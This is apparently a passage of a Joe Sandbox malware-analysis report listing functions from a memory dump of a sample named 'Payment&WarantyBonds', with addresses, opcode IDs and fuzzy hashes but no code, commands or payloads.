                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                • Instruction ID: 63c56cbd36671984491947d8de76022164e087712d83cb515eaaba7417bb69c8
                                                                                                                                                                                • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                • Instruction Fuzzy Hash: 0001F5726001209BEF118E59D880E9377A6BFD8600F9540ABEF15CF366DAB5CC81C390
                                                                                                                                                                                Function 0141C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                • Instruction ID: 9039d473d3da5c86fa057c1cb02d32ab96b17c93dbd98b9113c648e437860a5a
                                                                                                                                                                                • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 2601FC726007459FEB22DBAAD840FA77BE9FFD6650F04441FEA468B660DE74E402C760
                                                                                                                                                                                Function 014620F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 23517fc7142b9521e45efe716c6a551393fa1a8ea415f7ba64cd3712da7cfc75
                                                                                                                                                                                • Instruction ID: 3e18248bb531cc2cd76359ec02d231f6c5ea93649446d1505f3e0d0ecb19142e
                                                                                                                                                                                • Opcode Fuzzy Hash: 23517fc7142b9521e45efe716c6a551393fa1a8ea415f7ba64cd3712da7cfc75
                                                                                                                                                                                • Instruction Fuzzy Hash: F811AD75A0020DEBCF05EF64C841EAE7BB9EB98384F00405AE9019B360D635AE11CB91
                                                                                                                                                                                Function 0145E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f173ab1ad76dbac68ecf7fb7973f7d9a389ef2e4e1fd6e54fe2d726dd074cea8
                                                                                                                                                                                • Instruction ID: ec9fa543ae3e232a400aa39ba844900daf7e012317a133f6046f50acc2f5e814
                                                                                                                                                                                • Opcode Fuzzy Hash: f173ab1ad76dbac68ecf7fb7973f7d9a389ef2e4e1fd6e54fe2d726dd074cea8
                                                                                                                                                                                • Instruction Fuzzy Hash: 77018472201515BBD711AB6ACD40E57BBACFBE8664700056FB50597671DB74EC01C6A0
                                                                                                                                                                                Function 01419353 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                                • Instruction ID: 80ae53119500aa3c8d2d75be9373609f6e5fec9eea3b4ad6cb05e4662b04c8a3
                                                                                                                                                                                • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                                                                                                                • Instruction Fuzzy Hash: 7811A132540B02DFD7319F16C890B22B7E4FF98766F15886ED4894A5BAC374E881CB50
                                                                                                                                                                                Function 014AC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4f808e6941ecef5e8d339af1a7fe4f9723d1452ba90c9042ebae1720bb3d215f
                                                                                                                                                                                • Instruction ID: f67f7444118259778fd486200920197eb1b4005d3e13601eaec892de856136ec
                                                                                                                                                                                • Opcode Fuzzy Hash: 4f808e6941ecef5e8d339af1a7fe4f9723d1452ba90c9042ebae1720bb3d215f
                                                                                                                                                                                • Instruction Fuzzy Hash: 15116D75A0120DEBDF15EF69C884EAE7BBAFB68344F01406AFD0197360DA35E911CB90
                                                                                                                                                                                Function 0145D1D0 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                                • Instruction ID: 605c033691271167c76e66aa63e9a3ed16b31a70d8ec51448481a7f7712f06f4
                                                                                                                                                                                • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                                                                                                                • Instruction Fuzzy Hash: EB012F72E002059BDB11DF99E800B6A77A9EFA5A74F14851FFE118B3A2CB34D902C781
                                                                                                                                                                                Function 014433A5 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                                • Instruction ID: 9157b1234b04b0bfec5fe183f77c86d6f2be12b4752193bf1b5e964830f1ecd9
                                                                                                                                                                                • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                                                                                                                • Instruction Fuzzy Hash: C4016236300125A7EB129F9A9D01E9B7E7CAF94A50B15442ABA15D7271EA30D942C760
                                                                                                                                                                                Function 014DF5BE Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a153b25e1dc284d5d2b9d1195b23887937a4be7b7a331d70e9750b7884d6b00b
                                                                                                                                                                                • Instruction ID: 0f10207ac9d7d2f8ae9bf3afa8644a8a3fbf90ece3ad731c2c813cf19790b08b
                                                                                                                                                                                • Opcode Fuzzy Hash: a153b25e1dc284d5d2b9d1195b23887937a4be7b7a331d70e9750b7884d6b00b
                                                                                                                                                                                • Instruction Fuzzy Hash: 0801B170A00249AFDB14EF69D851FAEBBF8EF54304F00402BB904EB390D674DA06CB91
                                                                                                                                                                                Function 014DF453 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dd55a2472c6875e0f6451479dfa0db5001e4db091ed49a6a8445761dc727e479
                                                                                                                                                                                • Instruction ID: 7fbb297979ed88dd2d1a3d3649eef476b920b4d158719731d9a190af6e76d1e2
                                                                                                                                                                                • Opcode Fuzzy Hash: dd55a2472c6875e0f6451479dfa0db5001e4db091ed49a6a8445761dc727e479
                                                                                                                                                                                • Instruction Fuzzy Hash: 3001B171A10249AFDB14EF69D851FAEBBBCEF54314F00402BB900EB390D674DA05CB91
                                                                                                                                                                                Function 0143E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                • Instruction ID: 6037187abc1b6cbfcf17762be92e85beac3d9473566f9025e4da49e68b1c3421
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                • Instruction Fuzzy Hash: 900171712015809FE322861DC948F67BBE8EB98754F0904A7F905DB7B2D638DC41CA21
                                                                                                                                                                                Function 0141826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fecf05cdb89f0e8148820cbdbda4351cb997b4cdae820890e3d328eec41f7ccf
                                                                                                                                                                                • Instruction ID: 2711f87dec55cc952f08d33d5829f44ac57f785a2c984725295d8f699eccfb3b
                                                                                                                                                                                • Opcode Fuzzy Hash: fecf05cdb89f0e8148820cbdbda4351cb997b4cdae820890e3d328eec41f7ccf
                                                                                                                                                                                • Instruction Fuzzy Hash: A401D4317005069BD715EB6AD8109EB7BA8FFA0620F4A402B9901DB768DE30D801C390
                                                                                                                                                                                Function 014DF367 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 75dbab5813dc788beedb8ed156f1bfc159ffe9057341a70aa453a4835744f92d
                                                                                                                                                                                • Instruction ID: fc7abb106efc011ae72176cb77bc0dab79b3b0a832204fd948ddf0cd693e597c
                                                                                                                                                                                • Opcode Fuzzy Hash: 75dbab5813dc788beedb8ed156f1bfc159ffe9057341a70aa453a4835744f92d
                                                                                                                                                                                • Instruction Fuzzy Hash: A801D471A00258ABDB10EFAAD815FAFBBB8EF54704F00002BB501EB390DA74D905C790
                                                                                                                                                                                Function 01422582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 33c22f37a1bba271a95bddfa53ef81dfae0984056a6ccf00a1eb2e33fd9d72cf
                                                                                                                                                                                • Instruction ID: fe0cf14d34930d47ff94d9dc53ccfc0f9b2a383274e128e078118202f48bbda3
                                                                                                                                                                                • Opcode Fuzzy Hash: 33c22f37a1bba271a95bddfa53ef81dfae0984056a6ccf00a1eb2e33fd9d72cf
                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0F933641A20B7C7319F578C40F477AA9EBD4AA0F14802AE605D7660C670ED41C6A0
                                                                                                                                                                                Function 014F5152 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 77c53cb9e641a5ad9089eac4365f22faf1c5d133e56c3c7ec93563c545c1828c
                                                                                                                                                                                • Instruction ID: e5e178581ea2ba10176d4adbad28940eb4b2dc93e3b7bdeccd6316f4310db58a
                                                                                                                                                                                • Opcode Fuzzy Hash: 77c53cb9e641a5ad9089eac4365f22faf1c5d133e56c3c7ec93563c545c1828c
                                                                                                                                                                                • Instruction Fuzzy Hash: 39012CB1A10249ABDB01DFA9D9419EEBBF8FF58704F10405AEA04EB350D634AA018BA1
                                                                                                                                                                                Function 014F5060 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8088d621bc85704bef98f48e9d037b3c21846352d18a44e8bc9eb7bd294807e0
                                                                                                                                                                                • Instruction ID: f03ac5532d999730fa880cc06e8aae8ac3cfdd1346d719c3f2870be54d00b235
                                                                                                                                                                                • Opcode Fuzzy Hash: 8088d621bc85704bef98f48e9d037b3c21846352d18a44e8bc9eb7bd294807e0
                                                                                                                                                                                • Instruction Fuzzy Hash: 82012CB5A10249AFDB04DFA9D9419EEBBF8FF58304F10405AFA05EB351D634AA018BA1
                                                                                                                                                                                Function 0144C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                • Instruction ID: 08d66e2b9837261088499359d45c0bc2cc9e818e694734b4bc8b32f8ffae24e5
                                                                                                                                                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                • Instruction Fuzzy Hash: F6F0C2F2601611ABE328CF8EDC40E57FBEEDBD5A90F088129A505CB320EA31DD04CB90
                                                                                                                                                                                Function 014F50D9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6a2a94362019d9ed7761ac5da124878c5f484ee2c68e4123bfae9e148a981d7b
                                                                                                                                                                                • Instruction ID: f1063536f53a196675cc332d0b4b2671dc7be3767a644527d99298d2ff33cf4c
                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2a94362019d9ed7761ac5da124878c5f484ee2c68e4123bfae9e148a981d7b
                                                                                                                                                                                • Instruction Fuzzy Hash: D50121B1A0020DABDB00DF69E9459DEB7F8FF59304F50405AE604F7350D674A9018BA1
                                                                                                                                                                                Function 0141C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                • Instruction ID: df9235d0aca1196f96331b1994e11e609a22402696a1c9702871e63e5f5ff051
                                                                                                                                                                                • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                • Instruction Fuzzy Hash: B8F0FC732846339BD7321B9A8CC0B6BA9959FE5A64F19003BE2099B668C9748D0356D0
                                                                                                                                                                                Function 014F5537 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 12da67f9ca115114f747a1d8d505f69037f3a61eaf7d476a147cf735dc6a4ef7
                                                                                                                                                                                • Instruction ID: 62d8961dbee63935a2e0602c6a87cbbe8aade591f38569a605ec51a87a9294d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 12da67f9ca115114f747a1d8d505f69037f3a61eaf7d476a147cf735dc6a4ef7
                                                                                                                                                                                • Instruction Fuzzy Hash: E9111B70A1024ADFDB04DFA9D545BAEFBF4BF18304F04426AE518EB392E634D941CB91
                                                                                                                                                                                Function 014F61E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5df2b8d1661519903bcf9debd2a760c4fb2b17ef632b5b6982e8b0ab7c4877d7
                                                                                                                                                                                • Instruction ID: 9c18423991a39ba9714ce5845be852d424a12cb6fd888a61e55000fa43b6ce68
                                                                                                                                                                                • Opcode Fuzzy Hash: 5df2b8d1661519903bcf9debd2a760c4fb2b17ef632b5b6982e8b0ab7c4877d7
                                                                                                                                                                                • Instruction Fuzzy Hash: AE018F71A002499BDB00EFA9D445AEEBBF8BF58314F15005EE500EB390D734EA02CB95
                                                                                                                                                                                Function 014A63C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                • Instruction ID: 5c3fa22929a38a99e5d39ff92c45d0e47b93f0005b5840b5e7e31ecebc858f69
                                                                                                                                                                                • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                • Instruction Fuzzy Hash: 67F01D7220001DBFEF019F95DD80DAF7B7EEB692A8B154129FA1192170D635DD21ABA0
                                                                                                                                                                                Function 014DF2F8 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a6e3785efabe4b0e78fdcc60e2df536af46ffb3843e51546afb06bf8509af71c
                                                                                                                                                                                • Instruction ID: cbc08b53115898bc408456eedbc7f047284e03b447b4e70d48c280d7ca2a30c9
                                                                                                                                                                                • Opcode Fuzzy Hash: a6e3785efabe4b0e78fdcc60e2df536af46ffb3843e51546afb06bf8509af71c
                                                                                                                                                                                • Instruction Fuzzy Hash: 86F0C872B10348ABDB14DFBAD415AEEB7B8EF58710F01805BE511EB290DE74D9068751
                                                                                                                                                                                Function 0145724D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                                • Instruction ID: 78b3721d36c8828e2fdac72015401fe42032065ddda975d9d491d5ef67ba35f9
                                                                                                                                                                                • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                                • Instruction Fuzzy Hash: C3F0FC71A012556BEB50DB6D8540FAB7BA8DF90651F48417BFE0197262D670D940C650
                                                                                                                                                                                Function 0141C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c91603ce3d13aa75ccfb06b55f3c6b713b4522b92efb872d63ffadac9bb5235c
                                                                                                                                                                                • Instruction ID: accfe712f35a2d60fcc1981b143c1ec98a0280cf6d6031ed4d47c4c7b2c377ea
                                                                                                                                                                                • Opcode Fuzzy Hash: c91603ce3d13aa75ccfb06b55f3c6b713b4522b92efb872d63ffadac9bb5235c
                                                                                                                                                                                • Instruction Fuzzy Hash: 87F024712C42419BF310962A8C81F233296EBD0664F65802FEB098F3E5EA70DC058BA4
                                                                                                                                                                                Function 014F53FC Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2a21e88b4a19c271d63d09673ede2da9797464b1a6f8623672360e017f4b1eae
                                                                                                                                                                                • Instruction ID: 2f9be6c9944ba42bee3fb1996de354db7a92126f0f4829adb8274050c5bf2fb1
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a21e88b4a19c271d63d09673ede2da9797464b1a6f8623672360e017f4b1eae
                                                                                                                                                                                • Instruction Fuzzy Hash: CB012CB0E0020ADFDB04DFA9D545B9EF7F4FF18304F14827AA519EB391EA349A458B91
                                                                                                                                                                                Function 0145656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013F0000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_2_2_13f0000_Payment&WarantyBonds.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 546770970305d316d2c5a98994e9158fda362db2cdfc0e12f3ba9857f3860844
                                                                                                                                                                                • Instruction ID: e3bc83f37d788dd39f9ddd4fe72083ec05449a7fb646dc37efaf0fd234269773
